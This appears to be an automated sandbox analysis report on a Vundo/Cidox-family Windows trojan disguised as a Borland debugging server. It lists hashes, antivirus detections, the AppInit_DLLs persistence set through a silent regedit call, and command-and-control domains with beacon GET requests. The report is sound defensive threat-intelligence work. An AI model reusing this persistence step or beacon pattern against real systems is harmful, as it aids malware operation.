Analysis Date2015-01-06 15:29:40
MD5b4d83993aabaec10b2329096de9497ca
SHA1e55a6ed211b62f493f0f00fceb975a5e27f79dd0

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: dad271b0925d710fe2596bf9e74126d7 sha1: 524f63c4dccca5e202d825af920829cca1aac49e size: 90624
Section_ASM2 md5: 58043d02ccf8f9ae866cea43ce553b29 sha1: 7eaf1194e20f44f3da8923d46953c768b5819ee9 size: 62976
Section.rdata md5: a3e757bb04ccd96244fe0b072fc44fe9 sha1: 4c8a2d6f0fd9c72c872af58268a373a579cc5d79 size: 7680
Section.data md5: 3a1f36d197422dd28a87e9236978c8e9 sha1: 6ce8c5ad6adace77e9eabd4cdc4bd9fea4dfcfb8 size: 5120
Section.tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section.rsrc md5: 60e55ce07d03081b805655faddaed3dc sha1: 087f641996e1031fad80ef5e6c8ef37b35450b9b size: 17920
Timestamp2012-09-19 16:55:32
VersionLegalCopyright: Copyright © Borland Software Corporation 1990, 2001
InternalName: BORDBG61
FileVersion: 70.08.08.1442
CompanyName: Borland Software Corporation
ProductName: Borland Remote Debugging Server
ProductVersion: 51.00
FileDescription: Borland Remote Debugging Server
OriginalFilename: bordbg61.exe
PackerMicrosoft Visual C++ ?.?
PEhashe8c3d33c4325ab07a10692937bbc050a27d94aa0
IMPhash4ee4fcb1e8f606f7897286b8d895d4d5
AV360 Safeno_virus
AVAd-AwareGen:Variant.Kazy.211341
AVAlwil (avast)Vundo-XK [Trj]
AVArcabit (arcavir)Gen:Variant.Kazy.211341
AVAuthentiumW32/Cidox.A.gen!Eldorado
AVAvira (antivir)TR/Vundo.Gen8
AVBullGuardGen:Variant.Kazy.211341
AVCA (E-Trust Ino)Win32/Vundo.N!generic
AVCAT (quickheal)Trojan.Vundo.Gen
AVClamAVno_virus
AVDr. WebTrojan.Mayachok.17761
AVEmsisoftGen:Variant.Kazy.211341
AVEset (nod32)Win32/Citirevo.AD
AVFortinetW32/Citirevo.AB!tr
AVFrisk (f-prot)W32/Cidox.A.gen!Eldorado
AVF-SecureGen:Variant.Kazy.211341
AVGrisoft (avg)Generic_r.BGI
AVIkarusTrojan-Downloader.Win32.Vundo
AVK7Backdoor ( 04c4f2bf1 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesTrojan.Agent
AVMcafeeVundo-FASV!B4D83993AABA
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Vundo.J
AVMicroWorld (escan)Gen:Variant.Kazy.211341
AVRisingno_virus
AVSophosMal/Vundo-K
AVSymantecTrojan.Gen
AVTrend MicroTROJ_VUNDO.SMKK
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_CURRENT_USER\SessionInformation\ProgramCount ➝
NULL
Creates FileC:\WINDOWS\system32\lxmolud.dll
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates ProcessC:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNS91.233.89.106
Winsock DNSclickbeta.ru
Winsock DNSdenadb.com
Winsock DNSterrans.su
Winsock DNSnsknock.com
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSdenareclick.com
Winsock DNSfescheck.com
Winsock DNSinstrango.com
Winsock DNSflersomstk.com
Winsock DNStegimode.com
Winsock DNSnetrovad.com
Winsock DNSnshouse1.com
Winsock DNSforadns.com
Winsock DNSgetavodes.com
Winsock DNSclickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝
C:\WINDOWS\system32\lxmolud.dll\\x00

Network Details:

DNSinstrango.com
Type: A
204.11.56.45
DNSdenadb.com
Type: A
204.11.56.45
DNSforadns.com
Type: A
141.8.225.62
DNSflersomstk.com
Type: A
DNSgetavodes.com
Type: A
DNStryatdns.com
Type: A
DNSfescheck.com
Type: A
DNSnetrovad.com
Type: A
DNSnsknock.com
Type: A
DNSterrans.su
Type: A
DNStegimode.com
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSnshouse1.com
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://instrango.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1446&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2P0zPq9giUuF+z4BxvQikOazXqyulu9NmWegMFhYXRx
User-Agent:
HTTP GEThttp://denadb.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1446&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2P0zPq9giUuF+z4BxvQikOazXqyulu9NvWhAgoiEbt3
User-Agent:
HTTP GEThttp://foradns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1446&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2P0zPq9giUuF+z4BxvQikOazXqyulu9NvsEuqhnnjpb
User-Agent:
HTTP GEThttp://91.233.89.106/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=1446&av=0&vm=0&al=0&p=396&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg2P0zPq9giUuF+z4BxvQikOazXqyulu9Num+Q3bcsFbm
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1032 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.62:80
Flows TCP192.168.1.1:1034 ➝ 91.233.89.106:80

Raw Pcap

Strings